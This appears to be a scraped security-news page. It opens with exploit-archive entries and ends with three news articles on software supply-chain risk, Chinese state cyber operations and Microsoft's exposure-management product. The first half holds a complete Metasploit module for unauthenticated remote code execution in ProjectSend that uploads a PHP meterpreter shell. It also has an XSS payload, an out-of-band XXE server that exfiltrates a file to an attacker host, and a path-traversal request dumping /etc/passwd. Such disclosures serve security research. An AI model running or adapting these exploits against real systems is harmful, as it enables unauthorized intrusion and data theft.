This Metasploit module exploits vulnerabilities in OpenPrinting CUPS, which is running by default on most Linux distributions. The vulnerabilities allow an attacker on the LAN to advertise a malicious printer that triggers remote code execution when a victim sends a print job to the malicious printer. Successful exploitation requires user interaction, but no CUPS services need to be reachable via accessible ports. Code execution occurs in the context of the lp user. Affected versions are cups-browsed less than or equal to 2.0.1, libcupsfilters versions 2.1b1 and below, libppd versions 2.1b1 and below, and cups-filters versions 2.0.1 and below.

CUPS IPP Attributes LAN Remote Code Execution

This Metasploit module exploits an improper authorization vulnerability in ProjectSend versions r1295 through r1605. The vulnerability allows an unauthenticated attacker to obtain remote code execution by enabling user registration, disabling the whitelist of allowed file extensions, and uploading a malicious PHP file to the server.

    class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::PhpEXE  prepend Msf::Exploit::Remote::AutoCheck  class CSRFRetrievalError < StandardError; end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ProjectSend r1295 - r1605 Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an improper authorization vulnerability in ProjectSend versions r1295 through r1605.          The vulnerability allows an unauthenticated attacker to obtain remote code execution by enabling user registration,          disabling the whitelist of allowed file extensions, and uploading a malicious PHP file to the server.        },        'License' => MSF_LICENSE,        'Author' => [          'Florent Sicchio', # Discovery          'Hugo Clout', # Discovery          'ostrichgolf' # Metasploit module        ],        'References' => [          ['URL', 'https://github.com/projectsend/projectsend/commit/193367d937b1a59ed5b68dd4e60bd53317473744'],          ['URL', 'https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf'],        ],        'DisclosureDate' => '2024-07-19',        'DefaultTarget' => 0,        'Targets' => [          [            'PHP Command',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ]        ],        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new(          'TARGETURI',          [true, 'The TARGETURI for ProjectSend', '/']        )      ]    )  end  def check    # Obtain the current title of the website    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')    })    return CheckCode::Unknown('Target is not reachable') unless res    # The title will always contain "»" ("&raquo;") regardless of localization. For example: "Log in » ProjectSend"    title_regex = %r{<title>.*?&raquo;\s+(.*?)</title>}    original_title = res.body[title_regex, 1]    csrf_token = ''    begin      csrf_token = get_csrf_token    rescue CSRFRetrievalError => e      return CheckCode::Unknown("#{e.class}: #{e}")    end    # Generate a new title for the website    random_new_title = Rex::Text.rand_text_alphanumeric(8)    # Test if the instance is vulnerable by trying to change its title    params = {      'csrf_token' => csrf_token,      'section' => 'general',      'this_install_title' => random_new_title    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),      'keep_cookie' => true,      'vars_post' => params    })    return CheckCode::Unknown('Failed to connect to the provided URL') unless res    # GET request to check if the title updated    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')    })    # Extract new title for comparison    updated_title = res.body[title_regex, 1]    if updated_title != random_new_title      return CheckCode::Safe    end    # If the title was changed, it is vulnerable and we should restore the original title    params = {      'csrf_token' => csrf_token,      'section' => 'general',      'this_install_title' => original_title    }    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),      'keep_cookie' => true,      'vars_post' => params    })    return CheckCode::Appears  end  def get_csrf_token    vprint_status('Extracting CSRF token...')    # Make sure we start from a request with no cookies    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),      'keep_cookies' => true    })    unless res      fail_with(Failure::Unknown, 'No response from server')    end    # Obtain CSRF token    csrf_token = res.get_html_document.xpath('//input[@name="csrf_token"]/@value')&.text    raise CSRFRetrievalError, 'CSRF token not found in the response' if csrf_token.nil? || csrf_token.empty?    vprint_good("Extracted CSRF token: #{csrf_token}")    csrf_token  end  def enable_user_registration_and_auto_approve    csrf_token = ''    begin      csrf_token = get_csrf_token    rescue CSRFRetrievalError => e      fail_with(Failure::UnexpectedReply, "#{e.class}: #{e}")    end    # Enable user registration, automatic approval of new users allow all users to upload files and allow users to delete their own files    params = {      'csrf_token' => csrf_token,      'section' => 'clients',      'clients_can_register' => 1,      'clients_auto_approve' => 1,      'clients_can_upload' => 1,      'clients_can_delete_own_files' => 1,      'clients_auto_group' => 0,      'clients_can_select_group' => 'none',      'expired_files_hide' => '1'    }    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),      'vars_post' => params    })    # Check if we successfully enabled clients registration    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')    })    if res&.code == 200 && res.body.include?('Register as a new client.')      print_good('Client registration successfully enabled')    else      fail_with(Failure::Unknown, 'Could not enable client registration')    end  end  def register_new_user(username, password)    cookie_jar.clear    csrf_token = ''    begin      csrf_token = get_csrf_token    rescue CSRFRetrievalError => e      fail_with(Failure::UnexpectedReply, "#{e.class}: #{e}")    end    # Create a new user with the previously generated username and password    params = {      'csrf_token' => csrf_token,      'name' => username,      'username' => username,      'password' => password,      'email' => Rex::Text.rand_mail_address,      'address' => Rex::Text.rand_text_alphanumeric(8)    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'register.php'),      'keep_cookie' => true,      'vars_post' => params    })    fail_with(Failure::Unknown, 'Could not create a new user') unless res&.code != 403    print_good("User #{username} created with password #{password}")  end  def disable_upload_restrictions    cookie_jar.clear    csrf_token = ''    begin      csrf_token = get_csrf_token    rescue CSRFRetrievalError => e      fail_with(Failure::UnexpectedReply, "#{e.class}: #{e}")    end    print_status('Disabling upload restrictions...')    # Disable upload restrictions, to allow us to upload our shell    params = {      'csrf_token' => csrf_token,      'section' => 'security',      'file_types_limit_to' => 'noone'    }    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),      'keep_cookie' => true,      'vars_post' => params    })  end  def login(username, password)    cookie_jar.clear    csrf_token = ''    begin      csrf_token = get_csrf_token    rescue CSRFRetrievalError => e      fail_with(Failure::UnexpectedReply, "#{e.class}: #{e}")    end    print_status("Logging in as #{username}...")    # Attempt to login as our newly created user    params = {      'csrf_token' => csrf_token,      'do' => 'login',      'username' => username,      'password' => password    }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),      'vars_post' => params,      'keep_cookies' => true    })    # Version r1295 does not set a cookie on login, instead we check for a redirect to the expected page indicating a successful login    if res&.headers&.[]('Set-Cookie') || (res&.code == 302 && res&.headers&.[]('Location')&.include?('/my_files/index.php'))      print_good("Logged in as #{username}")      return csrf_token    else      fail_with(Failure::NoAccess, 'Failed to authenticate. This can happen, you should try to execute the exploit again')    end  end  def upload_file(username, password, filename)    login(username, password)    # Craft the payload    payload = get_write_exec_payload(unlink_self: true)    data = Rex::MIME::Message.new    data.add_part(filename, nil, nil, 'form-data; name="name"')    data.add_part(payload, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{Rex::Text.rand_text_alphanumeric(8)}\"")    post_data = data.to_s    # Upload the shell using a POST request    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'includes', 'upload.process.php'),      'ctype' => "multipart/form-data; boundary=#{data.bound}",      'data' => post_data,      'keep_cookies' => true    })    # Check if the server confirms our upload as successful    if res && res.body.include?('"OK":1')      print_good("Successfully uploaded PHP file: #{filename}")      json_response = res.get_json_document      @file_id = json_response.dig('info', 'id')      return res.headers['Date']    else      fail_with(Failure::Unknown, 'PHP file upload failed')    end  end  def calculate_potential_filenames(username, upload_time, filename)    # Hash the username    hashed_username = Digest::SHA1.hexdigest(username)    # Parse the upload time    base_time = Time.parse(upload_time).utc    # Array to store all possible URLs    possible_urls = []    # Iterate over all timezones    (-12..14).each do |timezone|      # Update the variable to reflect the currently looping timezone      adj_time = base_time + (timezone * 3600)      # Insert the potential URL into our array      possible_urls << "#{adj_time.to_i}-#{hashed_username}-#{filename}"    end    possible_urls  end  def cleanup    super    # Delete uploaded file    if @file_id      cookie_jar.clear      csrf_token = login(@username, @password)      # Delete our uploaded payload from the portal      params = {        'csrf_token' => csrf_token,        'action' => 'delete',        'batch[]' => @file_id      }      send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI'], 'manage-files.php'),        'vars_post' => params,        'keep_cookies' => true      })      # Version r1295 uses a GET request to delete the uploaded file      send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(datastore['TARGETURI'], 'manage-files.php'),        'keep_cookies' => true,        'vars_get' => {          'action' => 'delete',          'batch[]' => @file_id        }      })    end    cookie_jar.clear    csrf_token = ''    begin      csrf_token = get_csrf_token    rescue CSRFRetrievalError => e      fail_with(Failure::UnexpectedReply, "#{e.class}: #{e}")    end    # Disable user registration, automatic approval of new users, disallow all users to upload files and prevent users from deleting their own files    params = {      'csrf_token' => csrf_token,      'section' => 'clients',      'clients_can_register' => 0,      'clients_auto_approve' => 0,      'clients_can_upload' => 0,      'clients_can_delete_own_files' => 0    }    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),      'vars_post' => params    })    # Check if we successfully disabled client registration    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')    })    if res&.body&.include?('Register as a new client.')      fail_with(Failure::Unknown, 'Could not disable client registration')    end    print_good('Client registration successfully disabled')    print_status('Enabling upload restrictions...')    # Enable upload restrictions for every user    params = {      'csrf_token' => csrf_token,      'section' => 'security',      'file_types_limit_to' => 'all'    }    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),      'vars_post' => params    })  end  def trigger_shell(potential_urls)    # Visit each URL, to trigger our payload    potential_urls.each do |url|      send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(datastore['TARGETURI'], 'upload', 'files', url)      }, 1)    end  end  def exploit    enable_user_registration_and_auto_approve    username = Faker::Internet.username    password = Rex::Text.rand_text_alphanumeric(8)    filename = Rex::Text.rand_text_alphanumeric(8) + '.php'    # Set instance variables for cleanup function    @username = username    @password = password    register_new_user(username, password)    disable_upload_restrictions    upload_time = upload_file(username, password, filename)    potential_urls = calculate_potential_filenames(username, upload_time, filename)    trigger_shell(potential_urls)  endend

ProjectSend R1605 Unauthenticated Remote Code Execution

fronsetia version 1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Reflected XSS - fronsetiav1.1# Date: 11/2024# Exploit Author: Andrey Stoykov# Version: 1.1# Tested on: Debian 12# Blog:https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.htmlReflected XSS #1 - "show_operations.jsp"Steps to Reproduce:1. Visit main page of the application.2. In the input field of "WSDL Location" enter the following payload "><imgsrc=x onerror=alert(1)>// HTTP GET RequestGET/fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3EHTTP/1.1Host: 192.168.78.128:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0)Gecko/20100101 Firefox/133.0[...]// HTTP ResponseHTTP/1.1 200Content-Type: text/html;charset=ISO-8859-1Content-Length: 6360Date: Wed, 20 Nov 2024 19:42:15 GMTKeep-Alive: timeout=20Connection: keep-alive[...]<title> Fronsetia: "><img src=x onerror=alert(1)> </title>[...]

fronsetia 1.1 Cross Site Scripting

fronsetia version 1.1 suffers from an XML external entity injection vulnerability.

    # Exploit Title: XXE OOB - fronsetiav1.1# Date: 11/2024# Exploit Author: Andrey Stoykov# Version: 1.1# Tested on: Debian 12# Blog:https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-15-oob-xxe.htmlXXE OOBDescription:- It was found that the application was vulnerable XXE (XML External EntityInjection)Steps to Reproduce:1. Add Python3 server to serve malicious XXE payload2. Add a file on the file system to be read via the application XXE payloadecho 123123 > /tmp/1233. Enter the following URL as inputhttp://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl// Python Server Codefrom flask import Flask, Response, requestimport loggingapp = Flask(__name__)# Set up logginglogging.basicConfig(level=logging.DEBUG)@app.route('/testxxeService', defaults={'path': ''})def catch_all(path):    app.logger.debug("Serving XXE payload")    xml = """<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE data [  <!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd;]><data>&send;</data>"""    return Response(xml, mimetype='text/xml', status=200)@app.route('/data.dtd', defaults={'path': ''})def hello(path):    app.logger.debug("DTD requested")    xml = """<!ENTITY % file SYSTEM "file:///tmp/123"><!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">%eval;%exfil;"""    return Response(xml, mimetype='text/xml', status=200)if __name__ == "__main__":    app.run(host='0.0.0.0', port=10000)

fronsetia 1.1 XML Injection

Korenix JetPort 5601 version 1.2 suffers from a path traversal vulnerability.

    St. Pölten UAS 20241118-1-------------------------------------------------------------------------------                title| Path Traversal              product| Korenix JetPort 5601   vulnerable version| 1.2        fixed version| -           CVE number| CVE-2024-11303               impact| High             homepage| https://www.korenix.com/                found| 2024-05-24                   by| P. Oberndorfer, B. Tösch, M. Narbeshuber-Spletzer,                     | C. Hierzer, M. Pammer                     | These vulnerabilities were discovery during research at                     | St.Pölten UAS, supported and coordinated by CyberDanube.                     |                     | https://fhstp.ac.at | https://cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"Korenix Technology, a Beijer group company within the Industrial Communicationbusiness area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.With decades of experiences in the industry, we have developed various productlines [...].Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customerbase covers different Sales channels, including end-customers, OEMs, systemintegrators, and brand label partners. [...]"Source: https://www.korenix.com/en/about/index.aspx?kind=3Vulnerable versions-------------------------------------------------------------------------------Korenix JetPort 5601v3 / v1.2Vulnerability overview-------------------------------------------------------------------------------1) Path Traversal (CVE-2024-11303)A path traversal attack for unauthenticated users is possible. This allowsgetting access to the operating system of the device and access informationlike configuration files and connections to other hosts or potentially othersensitive information.Proof of Concept-------------------------------------------------------------------------------1) Path Traversal (CVE-2024-11303)By sending the following request to the following endpoint, a path traversalvulnerability can be triggered:-------------------------------------------------------------------------------GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1Host: 10.69.10.2Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Te: trailersConnection: keep-alive-------------------------------------------------------------------------------Note, that this is only possible when an interceptor proxy or a command linetool is used. A web browser would encode the characters and the path traversalwould not work.The response to the latter request is shown below:-------------------------------------------------------------------------------HTTP/1.1 200 OKServer: thttpd/2.19-MX Jun  2 2022Content-type: text/plain; charset=iso-8859-1[...]Accept-Ranges: bytesConnection: Keep-AliveContent-length: 86root::0:0:root:/root:/bin/falseadmin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true-------------------------------------------------------------------------------The vulnerabilities were manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------None. Device is End-of-Life.Workaround-------------------------------------------------------------------------------Limit the access to the device and place it within a segmented network.Recommendation-------------------------------------------------------------------------------CyberDanube recommends Korenix customers to upgrade to another device.Contact Timeline-------------------------------------------------------------------------------2024-09-23: Contacting Beijer Electronics Group via cs@beijerelectronics.com.2024-09-24: Vendor stated, that the device is end-of-life. Contact will ask the            engineering team if there are any changes.2024-10-15: Vendor stated, that the advisory can be published. No further            updates are planned for this device.2024-11-18: Coordinated disclosure of advisory.Web: https://www.fhstp.ac.at/Twitter: https://x.com/fh_stpoeltenMail: mis@fhstp.ac.atEOF T. Weber / @2024

Korenix JetPort 5601 1.2 Path Traversal

Secure by Demand offers a starting point for third-party risk management teams, but they need to take the essential step of using a mature software supply chain security solution to ensure they're not blindly trusting a provider's software.

Saša Zdjelar, Chief Trust Officer, ReversingLabs

November 22, 2024

5 Min Read

Source: Science Photo Library Alamy Stock Photo

COMMENTARY

In late June 2017, maritime giant A.P. Møller – Maersk was hit with a devastating software infection that affected "close to a fifth of the world's shipping capacity." 

As it turned out, the attack was not targeted at Maersk, but spun out of a regional "hot war" between Ukraine and Russia that saw a malware strain named "NotPetya" delivered to customers of a Ukrainian software company, with clients in the Ukraine and the rest of the world. The attack cost the global economy a whopping $10 billion in damages — the world's most costly cyber event to date.  

Seven years later, NotPetya is considered to be one of the most significant cyberattacks of our time. But this was not just a malware attack, but a software supply chain attack that exploited a commercial software update.  

In the years since, software supply chain attacks have taken center stage, with more incidents like NotPetya arising, including supply chain attacks on SolarWinds and the voice-over-IP firm 3CX. Also, Verizon's "2024 Data Breach Investigations Report" (DBIR) found that breaches stemming from third-party software development organizations increased by 68% from 2023. 

In response, the US Cybersecurity and Infrastructure Security Agency (CISA) released Secure by Design guidance in 2023. This move signaled to software producers the need to securely design their products, track and mitigate common vulnerabilities and exposures (CVEs), implement legacy AppSec tools, and enable protocols like multifactor authentication (MFA). But it wasn't until August 2024 that CISA released new Secure by Demand guidance that approaches this problem differently by empowering enterprise buyers to demand safer commercial software products from their suppliers, period.  

Secure by Demand is a good starting point for enterprise buyers looking to raise the bar for the firms that supply them business-critical software. However, it's imperative that these businesses go one step further. Here's why. 

**Software Assurance**

Secure by Demand targets several areas of software assurance: secure software development, vulnerability tracking and patching, authentication and logging, and software transparency. CISA hopes that enterprise consumers will ask commercial software vendors about each of these areas during the procurement process.

While these checks target key parts of software supply chain security, CISA's guidance should include more than a list of questions — not so different from the prevailing form of third-party risk management (TPRM), which relies heavily on questionnaires. Unfortunately, such an approach falls well short of providing genuine software assurance.

Instead, questionnaires leave major gaps in assessments of third-party cyber-risk, in that enterprise consumers will ask smart questions of commercial software vendors but won't possess the appropriate capabilities to verify their answers. That lapse leaves enterprise buyers vulnerable, requiring them to blindly trust the attestations of the mission-critical software products they rely on.  

The same can be said for software bills of materials (SBOMs), which Secure by Demand also recommends to enterprise buyers. SBOMs provide transparency in that they list a piece of software's components, which can include open source, proprietary, and third-party software. However, not listed in an SBOM are the calculated risks associated with third-party and commercial software products.  

Consider this: Neither a detailed SBOM nor a completed vendor security questionnaire would have thwarted the NotPetya attack, as customers were unaware of the existence of a Russian backdoor in the offending software update. So why should enterprise consumers take comfort from SBOMs and questionnaires alone when looking to protect their organizations? 

**Limited View of Supply Chain Risk**

It's true: Some of the checks recommended by CISA in its Secure by Demand guide include the vetting of open source software components used in commercial software products. CISA also calls for end-user organizations to determine how software vendors find, disclose, and patch vulnerabilities in their software. However, software supply chain risks extend well beyond these checks.  

Sophisticated cybercriminal and nation-state groups today are targeting commercial software by compromising build pipelines to insert malicious code, or by uncovering and abusing secrets lurking in application code. This is evident in the fact that the most detrimental software supply chain attacks to date did not occur due to cybercriminals exploiting open source components and vulnerabilities in software. Rather, they targeted commercial software directly, as was the case with NotPetya, 3CX, and more.  

**The Solution? Don't Trust — and Verify**

For enterprise buyers to ensure that the commercial software they are consuming is safe, they will need to independently validate the security of their mission-critical software. Doing so will require more than just asking vendors to answer a list of questions and provide an SBOM. Proper validation requires independently testing and verifying that software is free from malicious components (open source or commercial), critical vulnerabilities, malware, tampering, suspicious behaviors, and more — before, during, or after its deployment. 

Secure by Demand offers a solid starting point for TPRM teams. But they should then take the essential step of using a mature software supply chain security solution — one that provides comprehensive and independent software analysis, to ensure they are not blindly trusting their provider's software. Such a tool should also offer an actionable software risk assessment, which serves as a TPRM team's recipe for success when protecting their organization from such incidents.  

Having this level of control and verifiable evidence will allow enterprise consumers to verify the security and integrity of the mission-critical commercial software they rely on, even in the wake of the latest software supply chain attack. 

**About the Author**

Chief Trust Officer, ReversingLabs

Saša is the chief trust officer (CTrO) at ReversingLabs, and operating partner at Crosspoint Capital, with approximately 20 years of Fortune 10 global executive leadership experience. His CTrO scope includes leadership, oversight and governance of the CISO/CSO function, including product security, as well as partnering with other leaders on corporate and product strategy, strategic partnerships and research, and customer and technology advisory boards, including sponsoring the ReversingLabs CISO Council. Prior to ReversingLabs and Crosspoint Capital, Saša served as the senior vice president of security at Salesforce, where he led a global organization encompassing enterprise security, product security, offensive security, security engineering/automation, bug bounty programs, technical product/program/project management, and mergers and acquisitions. He also played a crucial role as the executive sponsor for strategic corporate security initiatives, such as zero trust.

Going Beyond Secure by Demand

The scale of Beijing's systematic tapping of private industry and universities to build up its formidable hacking and cyber-warfare capabilities is larger than previously understood.

Source: KaimDH via Shutterstock

Hundreds of private cybersecurity firms, technology services providers, and universities are helping China's state apparatus develop offensive cyber capabilities to support the country's strategic military, economic, and geopolitical goals, according to research released this week.

"The existence of state-sponsored threat groups operating under the Chinese state's direction has long been well documented," researchers at France's Orange Cyberdefense wrote in their report, based on eight months of analysis of China's cyber-offense capabilities. But any notions that these entities are strictly in government hands, especially given the authoritarian nature of China's government, are off base, the authors warned. "China's offensive cyber capabilities are, in fact, supported by a complex and multilayered ecosystem involving a broad array of state and non-state actors," they wrote.

Their findings provide deeper context on the troubling success that Chinese cyber actors have had infiltrating US critical infrastructure, breaching government, military, and business networks, not to mention theft of defense data, trade secrets, and intellectual property from American entities and others around the world.

**An Extensive Ecosystem**

The synergies have enabled quicker government access to cutting-edge technology and talent, especially in critical areas such as artificial intelligence (AI), big data analytics, 5G wireless, and cloud computing, says Dan Ortega, security strategist at Anomali. "China's collaboration between its tech companies and state entities has dramatically accelerated the development of its cyber-offensive capabilities," Ortega says. Importantly, it has also allowed the nation to scale state-sponsored cyber missions effectively. And that collaboration enables government access to vast data sets collected by companies, facilitating enhanced targeting and more-effective cyberattacks, he notes.

"China fosters formal and informal partnerships with tech firms through initiatives like the Military-Civil Fusion strategy, mandating companies to share their technological advancements and insights with the state," he says. A feedback loop exists in which innovations made in the private sector directly enhance state capabilities.

**Poised to Strike?**

The Orange report arrives as domestic concerns grow over Chinese cyberattacks on US entities, such as operations like Volt Typhoon's targeting of critical infrastructure organizations. Many in government and industry are convinced that Chinese groups have attained the presence they need on US networks to cause widespread disruption to domestic energy, telecommunications utilities, and technology services. Such concerns prompted the Office of the Director of National Intelligence (ODNI) to describe China as the "most active and persistent cyber threat to US government, private sector, and critical infrastructure networks," in its 2024 annual report.

Orange's research showed the four main government stakeholders responsible for building and executing China's cyber-offense capabilities are the People's Liberation Army (PLA), the Ministry of State Security (MSS), the Ministry of Public Security (MPS), and the Ministry of Industry and Information Technology (MIIT). Their multipronged efforts include actively recruiting or otherwise supporting private hackers and hacktivists in activities such as data theft, website defacement, and distributed denial-of-service attacks.

**Hundreds of Private Firms**

Under the current model, the government stakeholders are working with hundreds of private companies, both big and small, to carry out cyberattacks against foreign and domestic entities that are of strategic interest to Beijing, the Orange report noted. One example of big-player involvement in the report is Shanghai stock exchange-listed Integrity Technology Group (ITG), which the FBI has linked to the Flax Typhoon APT. Like ITG, many of China's top technology companies are also the state's biggest cyber contractors, according to Orange's report. "Enterprises such as ThreatBook, Qihoo360, and Qi An Xin not only provide defensive security solutions to public agencies but are also believed to indirectly contribute to offensive cyber operations."

At the other end of the spectrum are dozens of smaller and medium-size private entities that often act as subcontractors for the bigger companies and deliver a range of highly specialized services. One example is i-Soon, a 72-person Shanghai firm whose ties to the Chinese government emerged after a leak earlier this year. "These entities often act as subcontractors to the industry giants, filling the gap in their cyber offensive competencies and further fragmenting the hack-for-hire supply chain," Orange's researchers wrote. The company found that while in many instances, China's PLA, MSS, and others worked with legitimate private entities, others created shell companies that acted as fronts for procuring cyberattack infrastructure.

**Tapping Top Universities**

The Chinese government's efforts to rope in academic institutions began in earnest in 2017. Today many universities — including eight of the C9 League of China's top nine public universities — are engaged in state-sponsored cyber-offense research, according to Orange. Their contributions range from advanced research on the use of AI in cybersecurity to helping state operatives translate stolen documents and gathering open source intelligence.

Trey Ford, chief information security officer at Bugcrowd, says the willingness among Chinese companies to work for the government point up very different business norms in China. While organizations in countries like the US are beholden to fiduciary, legal, ethical, and privacy norms, those in China have a different set of obligations. "Communist government-backed organizations, aligned to formal Five-Year economic and military objectives, will have very different outcomes in mind, and can make different investments and sacrifices than capitalist businesses," he says.

Customer trust and user privacy are different context in China than in the US and other western nations, Ford says.  "Companies doing business in China must run their services in-country today. This includes the expectation of access to their systems, data, intellectual property — as well as their customers' data."

The continued expansion of China's cyber ecosystem will lead to more sophisticated attacks and better targeting of intellectual property and critical infrastructure through trusted business relationships, cautions Stephen Kowski, field chief technology officer at SlashNext Email Security+. "This model could enable more advanced supply chain compromises and social engineering attacks that bypass traditional security controls," Kowski says. "China's civil-military fusion model creates a seamless flow of technology and expertise between private sector innovations and state-sponsored cyber operations, enabling faster deployment of advanced attack techniques."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

China's Cyber Offensives Built in Lockstep With Private Firms, Academia

Building on its broad security portfolio, Microsoft's new exposure management is now available in the Microsoft Defender portal, with third-party-connectors on the way.

Source: Wavebreak Media ltd via Alamy Stock Photo

Microsoft is the latest big name to add continuous threat exposure management (CTEM) to its formidable security portfolio with the release of its new Microsoft Security Exposure Management offering. Microsoft made the announcement at its annual Microsoft Ignite conference this week.

Security experts describe CTEM, or proactive exposure management, as a programmatic and unified approach to detecting and mitigating threats. Gartner predicts that by 2026, organizations that embrace CTEM will see two-thirds fewer breaches.

Enterprise Strategy Group principal analyst Tyler Shields describes exposure management as the next iteration of vulnerability management.

"It's centered on the overlap of continuous asset discovery and management, threat and exposure analysis, and vulnerability discovery," Shields says. "If you can understand the assets you have, the state they are in, the vulnerabilities that exist, and the active threats against them, you are all prepared to secure your environment."

Microsoft initially introduced Security Exposure Management in March as a technical preview. It is now available in the Microsoft Defender portal, included with its E5 licenses, and as an option for various other Microsoft 365 licenses.

**Unified Views of Attack Surfaces**

With its entry, Microsoft seeks to enable defenders to prevent successful attacks by providing comprehensive and unified views of their organizations' broad attack surfaces, allowing them to take a more proactive approach to identifying and mitigating threats.

"Exposure management is critical for enabling teams to understand the posture of the organization, and it helps security teams see all the potential attack paths to critical assets as if they were looking through it, through the eyes of the attacker," said Vasu Jakkal, Microsoft's corporate VP for compliance, identity management, during the opening session at Ignite, which took place in Chicago.

The tooling is designed to identify attack paths and evaluate vulnerabilities in the context of an organization's critical assets in a more proactive and expansive manner than traditional vulnerability and threat detection offerings. Security Exposure Management uses Microsoft's new exposure graph APIs to identify attack paths and evaluate vulnerabilities in the context of critical assets.

Analysts say Microsoft's entry is poised to reshape the competitive environment of exposure management solutions offered by Cisco/Splunk, CrowdStrike, Palo Alto Networks Rapid7, Tenable, Trend Micro, and Wiz, as well as various others that provide more specialized capabilities.

"Exposure management is becoming an incredibly competitive market, and Microsoft is demonstrating that it wants to be a leader in this space," says Omdia principal analyst Andrew Braunberg.

Adds Forrester senior analyst Erik Nost, since Microsoft is initially allowing access to exposure management through a variety of licensing options, customers will have widespread access to insights.

"The data Microsoft possesses on existing customer environments without needing to ingest third-party data is the biggest opportunity for Microsoft to set it apart from competitors," Nost says. "Microsoft is building a platform that integrates a very broad set of security posture management telemetry."

**Building an Ecosystem of External Connections**

While the initial release is available and included with various Microsoft 365 and Microsoft Defender licenses and will ingest telemetry from those offerings, Microsoft announced it will enable integration with competing external third-party tools, including Qualys, Rapid7, Tenable, and ServiceNow's CMDB.

Microsoft released public preview versions of its third-party connectors, slated to become generally available next quarter.

Unlike Microsoft telemetry, which customers can ingest at no additional cost, they will incur charges to gather data from external sources, said Microsoft product director Brjann Brekkan, during a session on security exposure management at Ignite.

"We don't own that data," Brekkan explained. "We need to charge a little bit of cost to bring that third-party signal in, to attach those new data points from those services as well. But this is there for you to unify your data."

Security Exposure Management collects data through these connectors and normalizes it through its exposure graph, which maps relationships and exposes new attack paths. In a blog post, Brekkan said this provides "comprehensive attack surface visibility."

Microsoft exposure management also provides insights on the most critical assets, Internet exposure, and context related to business applications incorporated from the connected tools. Customers can view the integrated data, which can be visualized through the Attack Map tool or analyzed using advanced hunting queries via KQL (Kusto Query Language), Microsoft's Azure-based tool designed to identify anomalies in large data sets.

The offering now consists of three primary tools:

*   Attack Surface Management: Defenders have access to continuous views of their organization's attack surface. Notably, the tool identifies the most critical assets and those that are the prime targets of attackers
    
*   Attack Path Analysis: Security teams can visualize and prioritize high-risk attack paths, particularly those targeting those critical assets
    
*   Unified Exposure Insights: Administrators can view their organization's threat exposure, allowing them to prioritize risks and tie remediation priorities with business imperatives.
    

Omdia's Braunberg says it remains to be seen how many customers will build their exposure management strategies around Microsoft's offering, it is likely many will evaluate it, especially considering its potentially low cost.

"As per Microsoft's usual playbook, exposure management is attractive because it pulls together a lot of existing Microsoft functionality into an integrated solution with small incremental costs," he says.

**About the Author**

